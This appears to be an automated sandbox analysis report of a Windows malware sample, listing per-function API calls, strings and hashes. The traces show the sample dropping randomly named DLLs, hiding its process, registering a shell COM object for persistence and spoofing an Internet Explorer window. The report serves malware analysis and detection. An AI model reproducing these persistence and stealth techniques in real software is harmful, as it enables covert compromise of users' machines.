                            • GetStockObject.GDI32(00000000), ref: 00406EA8
                            • RegisterClassA.USER32(00000003), ref: 00406EC9
                            • CreateWindowExA.USER32(00000000,QueenKarton,QueenKarton,00CA0000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00408020), ref: 00406EF3
                            • CreateMutexA.KERNEL32(00000000,00000000,QueenKarton_12,%s\%s,00429080,dnkkq.dll,00428F60,%s\%s,00429080,kkq32.vxd,00418E30,%s\%s,00429080,kkq32.dll,00418D50,00000000), ref: 00406F12
                              • Part of subcall function 00402E06: GetVersion.KERNEL32 ref: 00402E22
                              • Part of subcall function 00402E06: GlobalMemoryStatus.KERNEL32(?), ref: 00402F9F
                              • Part of subcall function 00402E06: CloseHandle.KERNEL32(?), ref: 00403065
                            • GetVersion.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00429080,kkq32.dll,00418D50,00000000), ref: 00406F21
                            • GetModuleHandleA.KERNEL32(kernel32.dll,?,?,?,?,?,?,?,?,?,?,?,00429080,kkq32.dll,00418D50,00000000), ref: 00406F32
                            • GetProcAddress.KERNEL32(00000000,RegisterServiceProcess), ref: 00406F3D
                            • GetCurrentProcessId.KERNEL32(00000000,RegisterServiceProcess,kernel32.dll,?,?,?,?,?,?,?,?,?,?,?,00429080,kkq32.dll), ref: 00406F57
                            • CreateThread.KERNEL32(00000000,00000000,0040682B,00000000,00000000,?), ref: 00406F84
                            • CloseHandle.KERNEL32(00000000,00000000,00000000,0040682B,00000000,00000000,?), ref: 00406F8A
                            • CreateThread.KERNEL32(00000000,00000000,004068B0,00000000,00000000,?), ref: 00406FA3
                            • CloseHandle.KERNEL32(00000000,00000000,00000000,004068B0,00000000,00000000,?,00000000,00000000,00000000,0040682B,00000000,00000000,?), ref: 00406FA9
                            • SetTimer.USER32(00000001,000001F4,00000000,00000000), ref: 00406FBD
                            • TranslateMessage.USER32(?), ref: 00406FC8
                            • DispatchMessageA.USER32(?), ref: 00406FD7
                            • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 00406FE6
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.1984377301.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1984355938.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                            • Associated: 00000005.00000002.1984697052.000000000042A000.00000004.00000001.01000000.00000008.sdmpDownload File
                            • Associated: 00000005.00000002.1984738223.000000000042E000.00000020.00000001.01000000.00000008.sdmpDownload File
                            • Associated: 00000005.00000002.1984773155.000000000042F000.00000002.00000001.01000000.00000008.sdmpDownload File
                            • Associated: 00000005.00000002.1984812704.0000000000436000.00000020.00000001.01000000.00000008.sdmpDownload File
                            • Associated: 00000005.00000002.1984845188.0000000000438000.00000002.00000001.01000000.00000008.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_Olijjb32.jbxd
                            Yara matches
                            Similarity
                            • API ID: Handle$CloseCreatesprintf$MessageVersionrand$FileLoadModuleMutexProcessThread$AddressClassCopyCountCurrentCursorDirectoryDispatchExecExitGlobalIconMemoryNameObjectOpenProcRegisterStatusStockSystemTickTimerTranslateWindowexitsrand
                            • String ID: %s\%s$%s\%s.exe$2$3$QueenKarton$QueenKarton_12$RegisterServiceProcess$dnkkq.dll$kernel32.dll$kkq32.dll$kkq32.vxd
                            • API String ID: 607501245-2841515530
                            • Opcode ID: 47dc35882da9e6d4dfe293ecc6690f52e81bb2b6ce91e07ac91a2883a2b15265
                            • Instruction ID: b1e00ee85c63859ee3f052cf9651ba5d7fc827d99c5bd6e2bd8f21b679fb6b98
                            • Opcode Fuzzy Hash: 47dc35882da9e6d4dfe293ecc6690f52e81bb2b6ce91e07ac91a2883a2b15265
                            • Instruction Fuzzy Hash: E691C671F883286ADB10A7759C46FDD76A85B44704F5000BBB508FB2C2D6FC6D448BAE
                            Function 00403619 Relevance: 7.6, APIs: 5, Instructions: 58filememoryCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 60 403619-40364c CreateFileA 61 403664-403682 GetFileSize LocalAlloc 60->61 62 40364e-403652 60->62 63 403684-40368a 61->63 64 40368c-40368f 61->64 65 403654-403657 62->65 66 40365a-40365c 62->66 67 403692-4036ab ReadFile CloseHandle 63->67 64->67 65->66 66->61 68 4036ae-4036b2 66->68 67->68
                            APIs
                            • CreateFileA.KERNEL32(69D4CE72,80000000,?,00000000,?,00000080,00000000,00000001,297D5A2B,10624DD3,00000001,69D4CE72,10624DD3), ref: 00403642
                            • GetFileSize.KERNEL32(00000000,00000000,69D4CE72,80000000,?,00000000,?,00000080,00000000,00000001,297D5A2B,10624DD3,00000001,69D4CE72,10624DD3), ref: 00403667
                            • LocalAlloc.KERNEL32(00000040,-00000010,00000000,00000000,69D4CE72,80000000,?,00000000,?,00000080,00000000,00000001,297D5A2B,10624DD3,00000001,69D4CE72), ref: 00403674
                            • ReadFile.KERNEL32(00000000,10624DD3,00000000,00000000,00000000,00000040,-00000010,00000000,00000000,69D4CE72,80000000,?,00000000,?,00000080,00000000), ref: 0040369A
                            • CloseHandle.KERNEL32(00000000,00000000,10624DD3,00000000,00000000,00000000,00000040,-00000010,00000000,00000000,69D4CE72,80000000,?,00000000,?,00000080), ref: 004036A6
                            Memory Dump Source
                            • Source File: 00000005.00000002.1984377301.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1984355938.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                            • Associated: 00000005.00000002.1984697052.000000000042A000.00000004.00000001.01000000.00000008.sdmpDownload File
                            • Associated: 00000005.00000002.1984738223.000000000042E000.00000020.00000001.01000000.00000008.sdmpDownload File
                            • Associated: 00000005.00000002.1984773155.000000000042F000.00000002.00000001.01000000.00000008.sdmpDownload File
                            • Associated: 00000005.00000002.1984812704.0000000000436000.00000020.00000001.01000000.00000008.sdmpDownload File
                            • Associated: 00000005.00000002.1984845188.0000000000438000.00000002.00000001.01000000.00000008.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_Olijjb32.jbxd
                            Yara matches
                            Similarity
                            • API ID: File$AllocCloseCreateHandleLocalReadSize
                            • String ID:
                            • API String ID: 2632956699-0
                            • Opcode ID: dd1227ad1f3452ee8fc35f5791aff0d34791abb0994a93554c87423cd4fa6a6f
                            • Instruction ID: fb77f57afc793f1fdbd914af7197191687e2a95eac13cef646675694312e246c
                            • Opcode Fuzzy Hash: dd1227ad1f3452ee8fc35f5791aff0d34791abb0994a93554c87423cd4fa6a6f
                            • Instruction Fuzzy Hash: 14116531A00208BAEB216E65CC06F9DB7A8DB00765F108576FA10BA2D1D67DAF018B5D
                            Function 00403F68 Relevance: 33.4, APIs: 9, Strings: 10, Instructions: 135fileCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            APIs
                            • rand.CRTDLL(00000001,69D4CE72,10624DD3), ref: 00403FA7
                            • rand.CRTDLL(00000001,69D4CE72,10624DD3), ref: 00403FD4
                            • rand.CRTDLL(00000001,69D4CE72,10624DD3), ref: 00404010
                            • sprintf.CRTDLL(?,%s\%s.dll,00429080,?,00000001,69D4CE72,10624DD3), ref: 00404048
                            • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000000,00000000,?,%s\%s.dll,00429080,?,00000001,69D4CE72,10624DD3), ref: 00404063
                            • sprintf.CRTDLL(Oeanchcn,00429080,?,40000000,00000000,00000000,00000002,00000000,00000000,?,%s\%s.dll,00429080,?,00000001,69D4CE72,10624DD3), ref: 00404086
                            • WriteFile.KERNEL32(?,0042AA84,00001A01,?,00000000,Oeanchcn,00429080,?,40000000,00000000,00000000,00000002,00000000,00000000,?,%s\%s.dll), ref: 004040A4
                            • CloseHandle.KERNEL32(?,?,0042AA84,00001A01,?,00000000,Oeanchcn,00429080,?,40000000,00000000,00000000,00000002,00000000,00000000,?), ref: 004040BB
                            • sprintf.CRTDLL(?,CLSID\%s\InProcServer32,{79FEACFF-FFCE-815E-A900-316290B5B738},?,?,0042AA84,00001A01,?,00000000,Oeanchcn,00429080,?,40000000,00000000,00000000,00000002), ref: 004040D3
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.1984377301.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1984355938.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                            • Associated: 00000005.00000002.1984697052.000000000042A000.00000004.00000001.01000000.00000008.sdmpDownload File
                            • Associated: 00000005.00000002.1984738223.000000000042E000.00000020.00000001.01000000.00000008.sdmpDownload File
                            • Associated: 00000005.00000002.1984773155.000000000042F000.00000002.00000001.01000000.00000008.sdmpDownload File
                            • Associated: 00000005.00000002.1984812704.0000000000436000.00000020.00000001.01000000.00000008.sdmpDownload File
                            • Associated: 00000005.00000002.1984845188.0000000000438000.00000002.00000001.01000000.00000008.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_Olijjb32.jbxd
                            Yara matches
                            Similarity
                            • API ID: randsprintf$File$CloseCreateHandleWrite
                            • String ID: %s\%s.dll$2$3$Apartment$CLSID\%s\InProcServer32$Oeanchcn$Software\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad$ThreadingModel$Web Event Logger${79FEACFF-FFCE-815E-A900-316290B5B738}
                            • API String ID: 4269242784-2442642010
                            • Opcode ID: 5b9226bc97ce31b3811795df607ed7bbed4fe58e3f2db61338cee063268ccacc
                            • Instruction ID: 8034dccab87c86b1e0d8b3b5755954c703eafec793446a3a0ea57bc4b4fc6a7a
                            • Opcode Fuzzy Hash: 5b9226bc97ce31b3811795df607ed7bbed4fe58e3f2db61338cee063268ccacc
                            • Instruction Fuzzy Hash: E7415771F482286AD7109769EC46BE97AAC8B49304F5400FBB908F72C1D6FC9E458F69
                            Function 00403CE9 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 197COMMON
                            Download Yara Rule

                            Control-flow Graph

                            APIs
                            • rand.CRTDLL(00000001,69D4CE72,10624DD3,?,?,?,?,00406DCE,?,?,%s\%s.exe,00429080,?,00418D50,00000000), ref: 00403CFD
                            • memcpy.CRTDLL(-0042AA50,?,69D4CE72,10624DD3,?,?,?,?,00406DCE,?,?,%s\%s.exe,00429080,?,00418D50,00000000), ref: 00403D7A
                            • memset.CRTDLL(00406DCE,00000000,0000000C,-0042AA50,?,69D4CE72,10624DD3,?,?,?,?,00406DCE,?,?,%s\%s.exe,00429080), ref: 00403D8F
                            • rand.CRTDLL(?,?,?,?,?,?,?,10624DD3,?,?,?,?,00406DCE,?,?,%s\%s.exe), ref: 00403DF6
                            • rand.CRTDLL(?,?,?,?,?,?,?,10624DD3,?,?,?,?,00406DCE,?,?,%s\%s.exe), ref: 00403DFE
                            • rand.CRTDLL(?,?,?,?,?,?,?,10624DD3,?,?,?,?,00406DCE,?,?,%s\%s.exe), ref: 00403E1F
                            • rand.CRTDLL(?,?,?,?,?,?,?,10624DD3,?,?,?,?,00406DCE,?,?,%s\%s.exe), ref: 00403E27
                            • memcpy.CRTDLL(-0042AA4C,0042AA44,00000040,?,?,?,?,?,?,?,10624DD3,?,?,?,?,00406DCE), ref: 00403E52
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.1984377301.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1984355938.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                            • Associated: 00000005.00000002.1984697052.000000000042A000.00000004.00000001.01000000.00000008.sdmpDownload File
                            • Associated: 00000005.00000002.1984738223.000000000042E000.00000020.00000001.01000000.00000008.sdmpDownload File
                            • Associated: 00000005.00000002.1984773155.000000000042F000.00000002.00000001.01000000.00000008.sdmpDownload File
                            • Associated: 00000005.00000002.1984812704.0000000000436000.00000020.00000001.01000000.00000008.sdmpDownload File
                            • Associated: 00000005.00000002.1984845188.0000000000438000.00000002.00000001.01000000.00000008.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_Olijjb32.jbxd
                            Yara matches
                            Similarity
                            • API ID: rand$memcpy$memset
                            • String ID: +Z})
                            • API String ID: 1341957784-4018127762
                            • Opcode ID: 2b8c7437e1bd7430af5d83ecd7967c4870ae419bfa933bb167626543e718b489
                            • Instruction ID: df63eb390851271c68cbd719fcc6126871763b87c01c507511359465d0d2d2d2
                            • Opcode Fuzzy Hash: 2b8c7437e1bd7430af5d83ecd7967c4870ae419bfa933bb167626543e718b489
                            • Instruction Fuzzy Hash: A4719E31F042159BCB10CF69DD42A9E7BF5AF88354F584076E901B77A0D23CAA16CBAD
                            Function 00404148 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 50registryCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 69 404148-404190 RegCreateKeyExA 70 404193-404198 69->70 70->70 71 40419a-4041c2 RegSetValueExA RegCloseKey 70->71
                            APIs
                            • RegCreateKeyExA.ADVAPI32(69D4CE72,00000001,00000000,00000000,00000000,000F003F,00000000,00000000,69D4CE72,00000001,00006A14,{79FEACFF-FFCE-815E-A900-316290B5B738},?,?,?,004040F5), ref: 00404189
                            • RegSetValueExA.ADVAPI32(00000000,?,00000000,00000001,00429080,69D4CE72,69D4CE72,00000001,00000000,00000000,00000000,000F003F,00000000,00000000,69D4CE72,00000001), ref: 004041AB
                            • RegCloseKey.ADVAPI32(00000000,00000000,?,00000000,00000001,00429080,69D4CE72,69D4CE72,00000001,00000000,00000000,00000000,000F003F,00000000,00000000,69D4CE72), ref: 004041B9
                            Strings
                            • {79FEACFF-FFCE-815E-A900-316290B5B738}, xrefs: 0040414D
                            Memory Dump Source
                            • Source File: 00000005.00000002.1984377301.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1984355938.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                            • Associated: 00000005.00000002.1984697052.000000000042A000.00000004.00000001.01000000.00000008.sdmpDownload File
                            • Associated: 00000005.00000002.1984738223.000000000042E000.00000020.00000001.01000000.00000008.sdmpDownload File
                            • Associated: 00000005.00000002.1984773155.000000000042F000.00000002.00000001.01000000.00000008.sdmpDownload File
                            • Associated: 00000005.00000002.1984812704.0000000000436000.00000020.00000001.01000000.00000008.sdmpDownload File
                            • Associated: 00000005.00000002.1984845188.0000000000438000.00000002.00000001.01000000.00000008.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_Olijjb32.jbxd
                            Yara matches
                            Similarity
                            • API ID: CloseCreateValue
                            • String ID: {79FEACFF-FFCE-815E-A900-316290B5B738}
                            • API String ID: 1818849710-4250702572
                            • Opcode ID: 0b9791cc2bb803e0a6fddded9d2feb4d7971cdb144d1b8de1133cc46446009fc
                            • Instruction ID: 412fd7a6ac4860a679fa2010a2fd1b93dd732dea722ee027fa7473d1befc18ea
                            • Opcode Fuzzy Hash: 0b9791cc2bb803e0a6fddded9d2feb4d7971cdb144d1b8de1133cc46446009fc
                            • Instruction Fuzzy Hash: A7018472B00108BBEB114A95CC02FFEBA6AEF44764F250065FA00B71D1C6B1AE519754
                            Function 0040365E Relevance: 6.0, APIs: 4, Instructions: 30memoryfileCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 72 40365e-403682 GetFileSize LocalAlloc 74 403684-40368a 72->74 75 40368c-40368f 72->75 76 403692-4036b2 ReadFile CloseHandle 74->76 75->76
                            APIs
                            • GetFileSize.KERNEL32(00000000,00000000,69D4CE72,80000000,?,00000000,?,00000080,00000000,00000001,297D5A2B,10624DD3,00000001,69D4CE72,10624DD3), ref: 00403667
                            • LocalAlloc.KERNEL32(00000040,-00000010,00000000,00000000,69D4CE72,80000000,?,00000000,?,00000080,00000000,00000001,297D5A2B,10624DD3,00000001,69D4CE72), ref: 00403674
                            • ReadFile.KERNEL32(00000000,10624DD3,00000000,00000000,00000000,00000040,-00000010,00000000,00000000,69D4CE72,80000000,?,00000000,?,00000080,00000000), ref: 0040369A
                            • CloseHandle.KERNEL32(00000000,00000000,10624DD3,00000000,00000000,00000000,00000040,-00000010,00000000,00000000,69D4CE72,80000000,?,00000000,?,00000080), ref: 004036A6
                            Memory Dump Source
                            • Source File: 00000005.00000002.1984377301.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1984355938.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                            • Associated: 00000005.00000002.1984697052.000000000042A000.00000004.00000001.01000000.00000008.sdmpDownload File
                            • Associated: 00000005.00000002.1984738223.000000000042E000.00000020.00000001.01000000.00000008.sdmpDownload File
                            • Associated: 00000005.00000002.1984773155.000000000042F000.00000002.00000001.01000000.00000008.sdmpDownload File
                            • Associated: 00000005.00000002.1984812704.0000000000436000.00000020.00000001.01000000.00000008.sdmpDownload File
                            • Associated: 00000005.00000002.1984845188.0000000000438000.00000002.00000001.01000000.00000008.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_Olijjb32.jbxd
                            Yara matches
                            Similarity
                            • API ID: File$AllocCloseHandleLocalReadSize
                            • String ID:
                            • API String ID: 341201350-0
                            • Opcode ID: 2fd491c6994b402e35e8b9e545411a472b55f40d1e3a5e6431fc85953c0e0c00
                            • Instruction ID: f40f052c398d65a7c82f7348c4b70b1bbd35af8546e58ac1d0fc8a8e918c22c0
                            • Opcode Fuzzy Hash: 2fd491c6994b402e35e8b9e545411a472b55f40d1e3a5e6431fc85953c0e0c00
                            • Instruction Fuzzy Hash: 4EF01C76F04504BAEB01ABA58C02BDD77789B04319F108467F604B62C1D27D6B119B6E
                            Function 00407980 Relevance: 4.5, APIs: 3, Instructions: 47stringCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 78 407980-40798f GetCommandLineA 79 407991-4079a4 strchr 78->79 80 4079b4-4079b9 78->80 83 4079a6-4079a9 79->83 84 4079cf-4079dc GetModuleHandleA call 406c29 79->84 81 4079c0 80->81 82 4079bb-4079be 80->82 87 4079c3-4079c8 81->87 82->81 86 4079b3 82->86 85 4079ac-4079af 83->85 92 4079e1-4079e3 84->92 89 4079b1 85->89 90 4079ab 85->90 86->80 87->84 91 4079ca-4079cd 87->91 89->84 90->85 91->84 93 4079c2 91->93 93->87
                            APIs
                            • GetCommandLineA.KERNEL32(?,?,?,00401284,0042A020,0042A024,0042A028,00000000,00000000), ref: 00407985
                            • strchr.CRTDLL(00000001,00000022,?,?,?,00401284,0042A020,0042A024,0042A028,00000000,00000000), ref: 00407997
                            • GetModuleHandleA.KERNEL32(00000000,?,?,?,00401284,0042A020,0042A024,0042A028,00000000,00000000), ref: 004079D1
                            Memory Dump Source
                            • Source File: 00000005.00000002.1984377301.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1984355938.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                            • Associated: 00000005.00000002.1984697052.000000000042A000.00000004.00000001.01000000.00000008.sdmpDownload File
                            • Associated: 00000005.00000002.1984738223.000000000042E000.00000020.00000001.01000000.00000008.sdmpDownload File
                            • Associated: 00000005.00000002.1984773155.000000000042F000.00000002.00000001.01000000.00000008.sdmpDownload File
                            • Associated: 00000005.00000002.1984812704.0000000000436000.00000020.00000001.01000000.00000008.sdmpDownload File
                            • Associated: 00000005.00000002.1984845188.0000000000438000.00000002.00000001.01000000.00000008.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_Olijjb32.jbxd
                            Yara matches
                            Similarity
                            • API ID: CommandHandleLineModulestrchr
                            • String ID:
                            • API String ID: 2139856000-0
                            • Opcode ID: a85f45691ed6f3240fb139f31581347a401a2e524d65f22663fdacfbc6ab9f8e
                            • Instruction ID: bd194e91918afd51b414fff694719a57869652e1cfdb10064340714cce8cfdd4
                            • Opcode Fuzzy Hash: a85f45691ed6f3240fb139f31581347a401a2e524d65f22663fdacfbc6ab9f8e
                            • Instruction Fuzzy Hash: 98F062D1E2C28124FF3162764C4673FAD8A9782754F281477E482F62C2E5BCAD52922B
                            Function 00401219 Relevance: 3.0, APIs: 2, Instructions: 36COMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 94 401219 95 40121f-40127f __GetMainArgs call 407980 94->95 97 401284-401293 exit 95->97
                            APIs
                            • __GetMainArgs.CRTDLL(0042A020,0042A024,0042A028,00000000,00000000), ref: 00401262
                              • Part of subcall function 00407980: GetCommandLineA.KERNEL32(?,?,?,00401284,0042A020,0042A024,0042A028,00000000,00000000), ref: 00407985
                              • Part of subcall function 00407980: strchr.CRTDLL(00000001,00000022,?,?,?,00401284,0042A020,0042A024,0042A028,00000000,00000000), ref: 00407997
                              • Part of subcall function 00407980: GetModuleHandleA.KERNEL32(00000000,?,?,?,00401284,0042A020,0042A024,0042A028,00000000,00000000), ref: 004079D1
                            • exit.CRTDLL(00000000), ref: 0040128D
                            Memory Dump Source
                            • Source File: 00000005.00000002.1984377301.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1984355938.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                            • Associated: 00000005.00000002.1984697052.000000000042A000.00000004.00000001.01000000.00000008.sdmpDownload File
                            • Associated: 00000005.00000002.1984738223.000000000042E000.00000020.00000001.01000000.00000008.sdmpDownload File
                            • Associated: 00000005.00000002.1984773155.000000000042F000.00000002.00000001.01000000.00000008.sdmpDownload File
                            • Associated: 00000005.00000002.1984812704.0000000000436000.00000020.00000001.01000000.00000008.sdmpDownload File
                            • Associated: 00000005.00000002.1984845188.0000000000438000.00000002.00000001.01000000.00000008.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_Olijjb32.jbxd
                            Yara matches
                            Similarity
                            • API ID: ArgsCommandHandleLineMainModuleexitstrchr
                            • String ID:
                            • API String ID: 735354517-0
                            • Opcode ID: 4cf7b12bb1780c75f300c3ebf2e5b3677e9a846ab4eef9a36478d9a0a8233563
                            • Instruction ID: 1ee26eb31ace3a5089fdf6d32769bdd241f616d51084a453fd18da055c90a8b4
                            • Opcode Fuzzy Hash: 4cf7b12bb1780c75f300c3ebf2e5b3677e9a846ab4eef9a36478d9a0a8233563
                            • Instruction Fuzzy Hash: 52F09670F44300BBDB206F55DD03F167AA8EB08F1CF90002AFA44611D1D67D6420569F
                            Function 0040121F Relevance: 3.0, APIs: 2, Instructions: 35COMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 98 40121f-40127f __GetMainArgs call 407980 100 401284-401293 exit 98->100
                            APIs
                            • __GetMainArgs.CRTDLL(0042A020,0042A024,0042A028,00000000,00000000), ref: 00401262
                              • Part of subcall function 00407980: GetCommandLineA.KERNEL32(?,?,?,00401284,0042A020,0042A024,0042A028,00000000,00000000), ref: 00407985
                              • Part of subcall function 00407980: strchr.CRTDLL(00000001,00000022,?,?,?,00401284,0042A020,0042A024,0042A028,00000000,00000000), ref: 00407997
                              • Part of subcall function 00407980: GetModuleHandleA.KERNEL32(00000000,?,?,?,00401284,0042A020,0042A024,0042A028,00000000,00000000), ref: 004079D1
                            • exit.CRTDLL(00000000), ref: 0040128D
                            Memory Dump Source
                            • Source File: 00000005.00000002.1984377301.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1984355938.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                            • Associated: 00000005.00000002.1984697052.000000000042A000.00000004.00000001.01000000.00000008.sdmpDownload File
                            • Associated: 00000005.00000002.1984738223.000000000042E000.00000020.00000001.01000000.00000008.sdmpDownload File
                            • Associated: 00000005.00000002.1984773155.000000000042F000.00000002.00000001.01000000.00000008.sdmpDownload File
                            • Associated: 00000005.00000002.1984812704.0000000000436000.00000020.00000001.01000000.00000008.sdmpDownload File
                            • Associated: 00000005.00000002.1984845188.0000000000438000.00000002.00000001.01000000.00000008.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_Olijjb32.jbxd
                            Yara matches
                            Similarity
                            • API ID: ArgsCommandHandleLineMainModuleexitstrchr
                            • String ID:
                            • API String ID: 735354517-0
                            • Opcode ID: 3b2f29dedebab105fe7e3300aa923db6c3c370c5ed425738ec8fc91bc5ecbfbb
                            • Instruction ID: 22fee5bca0d1ee63cc250ffe024ab50772efda8fe48dde45178863df2fdfff2b
                            • Opcode Fuzzy Hash: 3b2f29dedebab105fe7e3300aa923db6c3c370c5ed425738ec8fc91bc5ecbfbb
                            • Instruction Fuzzy Hash: BEF090B0F44300BBDA206F55AC03F1A7AA8EB08B1CFA0002AFA44611E1DA7D6420569F

                            Non-executed Functions

                            Function 00405133 Relevance: 65.0, APIs: 28, Strings: 9, Instructions: 238stringCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            APIs
                            • lstrlenA.KERNEL32(?), ref: 00405181
                            • lstrlenA.KERNEL32(?,?), ref: 00405195
                            • lstrlenA.KERNEL32(?,?,?), ref: 004051A6
                            • lstrlenA.KERNEL32(?,?,?,?), ref: 004051C4
                            • lstrlenA.KERNEL32(?,?,?,?,?), ref: 004051D5
                            • lstrlenA.KERNEL32(?,?,?,?,?,?), ref: 004051E6
                            • InterlockedIncrement.KERNEL32(0042C48C), ref: 00405218
                            • memset.CRTDLL(?,00000000,00000010,?,?,?,?,?,?), ref: 0040522E
                            • GetTickCount.KERNEL32 ref: 00405239
                            • srand.CRTDLL(00000000,?,00000000,00000010,?,?,?,?,?,?), ref: 0040523F
                              • Part of subcall function 0040429C: RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019,?), ref: 004042D3
                            • LocalFree.KERNEL32(?,?,?,?,?,?,?), ref: 0040526C
                            • ExpandEnvironmentStringsA.KERNEL32(?,?,00000104,?,?,?,?,?,?), ref: 00405290
                            • LocalFree.KERNEL32(?,?,?,?,?,?,?,?,00000104,?,?,?,?,?,?), ref: 004052D4
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.1984377301.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1984355938.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                            • Associated: 00000005.00000002.1984697052.000000000042A000.00000004.00000001.01000000.00000008.sdmpDownload File
                            • Associated: 00000005.00000002.1984738223.000000000042E000.00000020.00000001.01000000.00000008.sdmpDownload File
                            • Associated: 00000005.00000002.1984773155.000000000042F000.00000002.00000001.01000000.00000008.sdmpDownload File
                            • Associated: 00000005.00000002.1984812704.0000000000436000.00000020.00000001.01000000.00000008.sdmpDownload File
                            • Associated: 00000005.00000002.1984845188.0000000000438000.00000002.00000001.01000000.00000008.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_Olijjb32.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrlen$FreeLocal$CountEnvironmentExpandIncrementInterlockedOpenStringsTickmemsetsrand
                            • String ID: %s%u - Microsoft Internet Explorer$7O{M$D$IEFrame$MicroSoft-Corp$Path$Software\Microsoft\IE Setup\Setup$X-okRecv11$\Iexplore.exe
                            • API String ID: 2987844104-963083691
                            • Opcode ID: a4e079000a0a70f6da611676ee79104fcc8748fed5030838b847c3b90d393ccd
                            • Instruction ID: eaf183550e18aa99804e3b29fd782d62b91feccc71c8544a1a81296d936fe118
                            • Opcode Fuzzy Hash: a4e079000a0a70f6da611676ee79104fcc8748fed5030838b847c3b90d393ccd
                            • Instruction Fuzzy Hash: 8E91B471E092186BDF20EB65CC49BDEB779AF40308F1440F6E208B61D1DAB96EC58F59
                            Function 00405C09 Relevance: 59.7, APIs: 25, Strings: 9, Instructions: 230stringfilesleepCOMMON
                            Download Yara Rule
                            APIs
                            • lstrlenA.KERNEL32(?), ref: 00405C3C
                            • GetTickCount.KERNEL32 ref: 00405C54
                            • srand.CRTDLL(00000000,?), ref: 00405C5A
                            • InterlockedIncrement.KERNEL32(0042C48C), ref: 00405C69
                            • memset.CRTDLL(?,00000000,00000010,0042C48C,00000000,?), ref: 00405C7F
                              • Part of subcall function 0040429C: RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019,?), ref: 004042D3
                            • ExpandEnvironmentStringsA.KERNEL32(?,?,00000104,?,?,?,?,00000000,?), ref: 00405CC2
                              • Part of subcall function 0040570C: GetTempPathA.KERNEL32(00000104,?), ref: 00405730
                              • Part of subcall function 0040570C: strcat.CRTDLL(?,.htm), ref: 00405764
                              • Part of subcall function 0040570C: sprintf.CRTDLL(?,<html>), ref: 00405778
                              • Part of subcall function 0040570C: rand.CRTDLL ref: 00405786
                              • Part of subcall function 0040570C: strcat.CRTDLL(?,0042CC6C), ref: 004057A4
                              • Part of subcall function 0040570C: rand.CRTDLL ref: 004057AC
                              • Part of subcall function 0040570C: rand.CRTDLL ref: 004057BE
                              • Part of subcall function 0040570C: sprintf.CRTDLL(?,%s<!-- %u -->,?), ref: 004057DF
                              • Part of subcall function 0040570C: rand.CRTDLL ref: 004057E7
                              • Part of subcall function 0040570C: strcat.CRTDLL(?,0042CC6C), ref: 00405805
